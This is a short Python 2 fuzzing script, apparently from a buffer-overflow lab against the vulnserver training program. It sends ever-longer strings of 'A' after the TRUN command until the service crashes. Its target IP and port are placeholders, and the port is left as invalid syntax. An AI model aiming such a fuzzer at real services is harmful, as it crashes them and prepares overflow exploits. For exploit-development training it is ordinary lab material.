#!/usr/bin/python

#Importing what I need 
import sys, socket
from time import sleep

buffer = "A" * 100

#This loop will exploit the given ip , port and communicate with the vuln server and fuzz it to check for crashes, failing built-in code assertions, or potential memory leaks. 
while True:
	try:
		s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		s.connect(('Given IP',Given port))
		
		s.send(('TRUN /.:/' + buffer))
		s.close()
		sleep(1)
		buffer = buffer + "A"*100
		
	except:
		print "fuzzing crashed at %s bytes" % str(len(buffer))
		sys.exit()
